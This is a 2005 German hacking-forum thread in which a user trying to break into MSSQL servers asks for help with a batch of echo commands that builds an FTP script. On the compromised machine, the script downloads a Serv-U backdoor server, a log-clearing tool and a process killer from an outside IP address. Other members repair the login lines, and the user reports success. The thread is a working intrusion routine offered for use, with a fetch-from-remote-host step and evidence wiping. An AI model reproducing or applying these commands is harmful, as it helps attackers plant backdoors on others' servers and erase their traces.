Mssql Script Probleme, PLZ help

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Desert-Fighter, 4. Mai 2005 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 4. Mai 2005
    Ich wollte mal MSSQL haxxorn, also lernen.
    habe aber mit dem script immer probleme,
    also das was er dan ausführt um an die Dateien vom FTP zu kommen.
    Bei mir sieht es so aus:


    Code:
    echo open 206.xxx.xxx.xxx >>c:\ftpscr.txt
    echo anonymous>>c:\ftpscr.txt
    echo anonymous@kaka.de>>c:\ftpscr.txt
    echo BINARY>>c:\ftpscr.txt
    echo get ServUDaemon.exe>>c:\ftpscr.txt
    echo get ServUDaemon.ini>>c:\ftpscr.txt
    echo get clearlogs.exe>>c:\ftpscr.txt
    echo get kill.exe>>c:\ftpscr.txt
    echo quit>>c:\ftpscr.txt
    
    bei xxx.xxx.xxx habe ich natürlich die richtigen zahlen.
    und dan zum bestätigen nimm ich das:

    Code:
    ftp -n -v -s:c:\ftpscr.txt
    dann kommt z.B. der Fehler:

    Code:
    Conectado a 206.xxx.xxx.xxx.
    
    open 206.xxx.xxx.xxx 220 Microsoft FTP Service
    Comando inválido.
    
    Comando inválido.
    
    anonymous
    anonymous@kaka.de
    BINARY
    530 Please login with USER and PASS.
    
    get ServUDaemon.exe
    530 Please login with USER and PASS.
    
    530 Please login with USER and PASS.
    
    get ServUDaemon.ini
    530 Please login with USER and PASS.
    
    get clearlogs.exe
    530 Please login with USER and PASS.
    
    get kill.exe
    530 Please login with USER and PASS.
    
    quit
    221 
    
    wäre echt net wenn mir wer helfen könnte,

    Achja, wäre auch hammer wenn einer mir die Fport.exe
    schicken könnte, den die finde ich net, falls mal später die ports besetzt sind...

    THX im vorraus, der mir helfen kann krigt natürlich ne 10!!
     

  2. Anzeige
  3. #2 4. Mai 2005
    lade die files die du vom pub holst mal mit dem usernamen:anonymous, und dem pw:anonymous@lol.com hoch oder anonymous@kaka.de und probiere es nochmal
     
  4. #3 4. Mai 2005
    du meinst also

    Code:
    echo open 206.xxx.xxx.xxx >>c:\ftpscr.txt
    echo usernamen:anonymous>>c:\ftpscr.txt
    echo pw:anonymous@kaka.de>>c:\ftpscr.txt
    echo BINARY>>c:\ftpscr.txt
    echo get ServUDaemon.exe>>c:\ftpscr.txt
    echo get ServUDaemon.ini>>c:\ftpscr.txt
    echo get clearlogs.exe>>c:\ftpscr.txt
    echo get kill.exe>>c:\ftpscr.txt
    echo quit>>c:\ftpscr.txt
    

    wenn ja, es geht trotzdem nicht, kommt gleicher fehler
     
  5. #4 4. Mai 2005
    oder mach dir nen axx bei lycos..
    klappt 100 %
    da haste dann nen user namen und nen pass


    :D :D :D
     
  6. #5 4. Mai 2005
    ich ahbe auch so user und Pass.

    er nimmt das script nur nicht an!!!!!!

    er gibt die Userdaten nicht ein...
    ka warum
     
  7. #6 4. Mai 2005
    So müsste es klappen...
    versuch mal den user namen und das Pw in reihe zu schreiben...

    Code:
    echo open 206.xxx.xxx.xxx >>c:\winnt\bla.txt
    echo user user+pass>>c:\winnt\bla.txt
    echo BINARY>>c:\winnt\bla.txt
    echo get ServUDaemon.exe>>c:\winnt\bla.txt
    echo get ServUDaemon.ini>>c:\winnt\bla.txt
    echo get clearlogs.exe>>c:\c:\winnt\bla.txt
    echo get kill.exe>>c:\winnt\bla.txt
    echo quit>>c:\winnt\bla.txt
    
    Script Starten:
    ftp -n -v -s:c:\winnt\bla.txt
    
    
    müsste klappen...
    oder der Server spackt rum...
     
  8. #7 4. Mai 2005
    @h4rdc0re

    thx, ich musste es zwar etwas umschreiben, aber dank dir bin ich drauf gekommen!!!
    ne 10 haste!
     

  9. Videos zum Thema
Die Seite wird geladen...
Similar Threads - Mssql Script Probleme
  1. Antworten:
    6
    Aufrufe:
    388
  2. Antworten:
    5
    Aufrufe:
    436
  3. Antworten:
    2
    Aufrufe:
    1.196
  4. Antworten:
    2
    Aufrufe:
    810
  5. Antworten:
    4
    Aufrufe:
    660